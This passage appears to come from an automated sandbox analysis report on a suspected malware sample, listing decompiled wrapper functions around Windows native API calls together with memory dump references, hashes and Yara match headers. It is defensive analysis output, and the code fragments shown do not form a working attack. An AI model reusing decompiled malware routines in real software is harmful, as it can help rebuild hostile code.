				_t3 = _t17 + 0xc40; // 0xc40
				E0041AF60(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x0041a35a
0x0041a35c
0x0041a35e
0x0041a363
0x0041a36f
0x0041a377
0x0041a3ad
0x0041a3b1

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f91a92923bd9f00b23a0ec92bc207d7fc5f9a6af962a09dbb8138a39cf288055
Instruction ID: 105ae22a64949c2b3f429a687d5e6160eb99de05237383b2f9f1addb5a21d6db
Opcode Fuzzy Hash: f91a92923bd9f00b23a0ec92bc207d7fc5f9a6af962a09dbb8138a39cf288055
Instruction Fuzzy Hash: E501A4B2201208ABCB08DF99DC85DEB77E9EF8C754F158248BA1D97241C630E8558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041a36f
0x0041a377
0x0041a3ad
0x0041a3b1

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A48B Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A48B(void* __eax, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t14;

				_t8 = _a4;
				_t3 = _t8 + 0x10; // 0x300
				_t4 = _t8 + 0xc50; // 0x40a943
				E0041AF60(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}

0x0041a493
0x0041a496
0x0041a49f
0x0041a4a7
0x0041a4b5
0x0041a4b9

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f1c8172f2a8dc1855c2bb51baad574eaad2ac39b9df49ee1509652ec6e2969b3
Instruction ID: 6df4afbd0c81a4beef467a1688ce84e9c83b89160ddfbffb0f2ed12ebbf7fb80
Opcode Fuzzy Hash: f1c8172f2a8dc1855c2bb51baad574eaad2ac39b9df49ee1509652ec6e2969b3
Instruction Fuzzy Hash: 2FE0C2B6200214AFD710EFD8DC85ED77768EF48760F258499BE0C9B242C130F5018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a493
0x0041a496
0x0041a49f
0x0041a4a7
0x0041a4b5
0x0041a4b9

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01689540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168954A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a010c9061b2c9deb779c60a1a7a319d0b47d931638bfa5f18ec7795cec48f09
Instruction ID: af6d6bda1eb8becea4b1f651fa5b5007f8d8afc5d0d21ebfafb59f7779aa76bc
Opcode Fuzzy Hash: 8a010c9061b2c9deb779c60a1a7a319d0b47d931638bfa5f18ec7795cec48f09
Instruction Fuzzy Hash: C8900265211040430605A9990B05517004EA7D5391351C031F1005550CD6618C616171

Uniqueness

Uniqueness Score: -1.00%

Function 01689910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168991A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89fffdb9720c108696be53df09dc04fb3f380348768f442589ecc7a525f0fc16
Instruction ID: 2cc9817ef5dc4ae2a242c45f9ea2eff1d77024e824d95eac003e22f93c50762a
Opcode Fuzzy Hash: 89fffdb9720c108696be53df09dc04fb3f380348768f442589ecc7a525f0fc16
Instruction Fuzzy Hash: BD9002B120104443D64075994905757000DA7D0341F51C021A5054554EC6998DD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 016895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016895DA

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1024209f2640eea459abf775977f3f5302ba9b9b0ec6c9db6649cf51c58fccce
Instruction ID: 99aadb8f0aa6e027cffcedda01ff466799deb6a44c2e717a8a981676c877f118
Opcode Fuzzy Hash: 1024209f2640eea459abf775977f3f5302ba9b9b0ec6c9db6649cf51c58fccce
Instruction Fuzzy Hash: 6D9002A120204043460575994915627400EA7E0241B51C031E1004590DC5658C917175

Uniqueness

Uniqueness Score: -1.00%

Function 016899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016899AA

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f9e7cb1de40c9ec0955944bdb42f3c1b8745da6e6ee756d6792d9bb810bf5fc
Instruction ID: 4a2c9f80f2ce9722f341d2f11dd924a05b9399f558b7b009bc5f40042a558e74
Opcode Fuzzy Hash: 4f9e7cb1de40c9ec0955944bdb42f3c1b8745da6e6ee756d6792d9bb810bf5fc
Instruction Fuzzy Hash: 379002A134104483D60065994915B17000DE7E1341F51C025E1054554DC659CC527176

Uniqueness

Uniqueness Score: -1.00%

Function 01689860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168986A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5736e4a503ccfab2f0f83fdd7bd9f22fc452dc9caef601343b20a1a813acb50
Instruction ID: 4484f505e2e0b8eef35548a340f9198c975d6c1718bc8b1d8a884927649c78eb
Opcode Fuzzy Hash: a5736e4a503ccfab2f0f83fdd7bd9f22fc452dc9caef601343b20a1a813acb50
Instruction Fuzzy Hash: 0390027120104453D61165994A05717000DA7D0281F91C422A0414558DD6968D52B171

Uniqueness

Uniqueness Score: -1.00%

Function 01689840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168984A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f2ba2fb6fe5a0d6206f41aed82b6febb5914d2a66b045565fa48025fd4b0407
Instruction ID: 98ee769f212612943d956a2bfa98f66cedd5411fd9bbd8792fdc296d2c1e3709
Opcode Fuzzy Hash: 7f2ba2fb6fe5a0d6206f41aed82b6febb5914d2a66b045565fa48025fd4b0407
Instruction Fuzzy Hash: 34900261242081935A45B5994905517400EB7E0281791C022A1404950CC5669C56E671

Uniqueness

Uniqueness Score: -1.00%

Function 016898F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016898FA

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fa796c12123d74ba18db28c48d6cfd8a62663b13dfc610721af28fdbb47a001
Instruction ID: 1b94186e548703d8afe279a9e9e3b0c1d77015901d27c8c001cf4b0e5a167e21
Opcode Fuzzy Hash: 6fa796c12123d74ba18db28c48d6cfd8a62663b13dfc610721af28fdbb47a001
Instruction Fuzzy Hash: 4F90026160104543D60175994905627000EA7D0281F91C032A1014555ECA658D92B171

Uniqueness

Uniqueness Score: -1.00%

Function 01689710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168971A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa152015b9cf22e54703fbad84ac4368359373bbc9c55ec9587c4b249b739b78
Instruction ID: d44b66c28829a5f441abc7365e862587eee96c6cb068101f8ab3fa17e7e5386f
Opcode Fuzzy Hash: fa152015b9cf22e54703fbad84ac4368359373bbc9c55ec9587c4b249b739b78
Instruction Fuzzy Hash: 3990027120104443D60069D95909657000DA7E0341F51D021A5014555EC6A58C917171

Uniqueness

Uniqueness Score: -1.00%

Function 016897A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016897AA

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41c814300d473328062c59757a742f2ffc00177710ffcbdde5b2689aff5a37d1
Instruction ID: f9bd511681b1d931d0eaab46a6b300889dbfc511605b1bbabf00e10f4ac51354
Opcode Fuzzy Hash: 41c814300d473328062c59757a742f2ffc00177710ffcbdde5b2689aff5a37d1
Instruction Fuzzy Hash: 0C90026130104043D64075995919617400DF7E1341F51D021E0404554CD9558C566272

Uniqueness

Uniqueness Score: -1.00%

Function 01689780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168978A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01272cfffc05d1f5af34976b2316b0aff419bb9ce9e1709583f3885ef96e525c
Instruction ID: 0b633e819d37348460a9e6f59cabee519c7cda4c70c6985edde3738617da6062
Opcode Fuzzy Hash: 01272cfffc05d1f5af34976b2316b0aff419bb9ce9e1709583f3885ef96e525c
Instruction Fuzzy Hash: 9490026921304043D6807599590961B000DA7D1242F91D425A0005558CC9558C696371

Uniqueness

Uniqueness Score: -1.00%

Function 01689660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0168966A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e1c17557afbfe3c214fd18cb528b64a001811e4417b96fb3fef0b9bb46ddafb
Instruction ID: 2536bc18e5106d900b28f90b0eeed2359bb2fedfa934ae9817a4ef33c426c5f3
Opcode Fuzzy Hash: 1e1c17557afbfe3c214fd18cb528b64a001811e4417b96fb3fef0b9bb46ddafb
Instruction Fuzzy Hash: E890027120104843D6807599490565B000DA7D1341F91C025A0015654DCA558E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 01689A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01689A5A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f394734c914be73c7b141f2230729ae0af34d8030ca730dba188fa36eeac9746
Instruction ID: d396cdc90b75145e95656c3c52cd25e550b7775600ac5556bea79dfc9caa3463
Opcode Fuzzy Hash: f394734c914be73c7b141f2230729ae0af34d8030ca730dba188fa36eeac9746
Instruction Fuzzy Hash: 1890026121184083D70069A94D15B17000DA7D0343F51C125A0144554CC9558C616571

Uniqueness

Uniqueness Score: -1.00%

Function 01689A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01689A2A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59501e7b2d12609e66a3ad57113d81f152b97f5506ba722a0d72e8144bd9d297
Instruction ID: 7b2e1e65fb47b9d91c4e383f1ed17b9cfffbb15b8e77ff9289cdefe0b0e2e730
Opcode Fuzzy Hash: 59501e7b2d12609e66a3ad57113d81f152b97f5506ba722a0d72e8144bd9d297
Instruction Fuzzy Hash: C790026160104083464075A98D45917400DBBE1251751C131A0988550DC5998C6566B5

Uniqueness

Uniqueness Score: -1.00%

Function 01689A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01689A0A

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57b91018ef42db8b47f8b5c3989707735695d7571ed6f38f8c887a1d2fcaa254
Instruction ID: a78c1193bd4afbee6e79f19fac533b0a6603a8f98f9aab573cb85ef51dcdcfb6
Opcode Fuzzy Hash: 57b91018ef42db8b47f8b5c3989707735695d7571ed6f38f8c887a1d2fcaa254
Instruction Fuzzy Hash: C590027120144443D60065994D1571B000DA7D0342F51C021A1154555DC6658C5175B1

Uniqueness

Uniqueness Score: -1.00%

Function 016896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016896EA

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a51d471d03cd5006b46cc8419724f3d8b114c335d46ed9f867dda76b1cb07f12
Instruction ID: b6c321a122993f6f9a5758cc04022d3aef3fcee4534bda49f033a571b33bc2b6
Opcode Fuzzy Hash: a51d471d03cd5006b46cc8419724f3d8b114c335d46ed9f867dda76b1cb07f12
Instruction Fuzzy Hash: 7A9002712010C843D6106599890575B000DA7D0341F55C421A4414658DC6D58C917171

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x0041a647
0x0041a652
0x0041a65d
0x0041a661

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00408310(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00408310
0x0040831f
0x00408323
0x0040832e
0x0040833e
0x0040834e
0x00408353
0x0040835a
0x0040835d
0x0040836a
0x0040836c
0x0040836e
0x0040838b
0x0040838b
0x00000000
0x0040838d
0x00408392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
